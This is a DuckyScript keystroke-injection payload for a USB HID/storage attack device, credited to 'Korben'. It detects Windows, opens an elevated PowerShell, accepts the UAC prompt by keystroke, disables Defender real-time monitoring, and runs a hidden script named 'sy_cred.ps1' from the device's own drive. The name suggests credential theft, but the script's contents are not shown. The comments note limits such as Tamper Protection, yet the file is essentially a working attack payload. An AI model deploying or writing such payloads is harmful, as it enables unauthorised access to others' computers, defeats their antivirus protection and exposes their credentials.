REM Enumerates as a keyboard (HID) plus mass storage; the storage volume is what the typed PowerShell further down locates by its label.
ATTACKMODE HID STORAGE
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Fully passive Windows OS detection with a built-in passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at the beginning of the payload (aside from ATTACKMODE) to act as a dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
REM Dynamic boot delay: the loop below waits #CHECK_INTERVAL ms per pass for at most #MAX_WAIT passes
REM (150 x 20 ms, about 3 s) and leaves early as soon as the host answers the lock-LED report
REM ($_RECEIVED_HOST_LOCK_LED_REPLY becomes TRUE). A host that never replies runs out the full count.
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
REM Heuristic: the number of HID configuration requests the host made during enumeration decides the OS.
REM More than #WINDOWS_HOST_REQUEST_COUNT is taken as WINDOWS; otherwise $_OS keeps #NOT_WINDOWS.
REM Other hosts may also cross that threshold, so the result is a best guess rather than proof.
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM Volume label of the device's storage partition; the typed PowerShell below matches
REM Win32_LogicalDisk.VolumeName against this value to find the drive letter.
DEFINE #DUCKY_DRIVER_LABEL DUCKY
DEFINE #PS1 sy_cred.ps1
REM Active stage, entered only when the passive detector above chose WINDOWS. Win+R, "powershell" and
REM Ctrl+Shift+Enter request an elevated console; LEFT then ENTER answers a Yes/No UAC consent prompt,
REM so a standard-user session, or a UAC level that asks for credentials, stops the sequence here.
REM All waits are fixed DELAYs, so the keystrokes depend on the host responding within those times.
IF ($_OS == WINDOWS )THEN
DELAY 200
REM -----open Powershell as Admin
GUI r
DELAY 200
STRING powershell
CTRL-SHIFT ENTER
DELAY 400
LEFT
DELAY 150
ENTER
DELAY 500
REM Everything up to END_STRINGLN is typed verbatim into the elevated console, so comments belong
REM here, before the block. The typed script finds the volume labelled #DUCKY_DRIVER_LABEL and changes
REM to it, attempts to turn off Defender real-time monitoring with Set-MpPreference (no effect while
REM Tamper Protection is enabled, and the state change is recorded in the Defender operational event
REM log, event 5001), starts #PS1 from that drive in a hidden window, then exits the console.
REM The contents of #PS1 are not part of this page.
STRINGLN_POWERSHELL
$duckletter = (Get-CimInstance -ClassName Win32_LogicalDisk | Where-Object { $_.VolumeName -eq '#DUCKY_DRIVER_LABEL' }).DeviceID;cd $duckletter
Set-MpPreference -DisableRealtimeMonitoring $true
Start-Process powershell.exe -ArgumentList "-NoProfile -WindowStyle Hidden -File #PS1" -WindowStyle Hidden
exit
END_STRINGLN
END_IF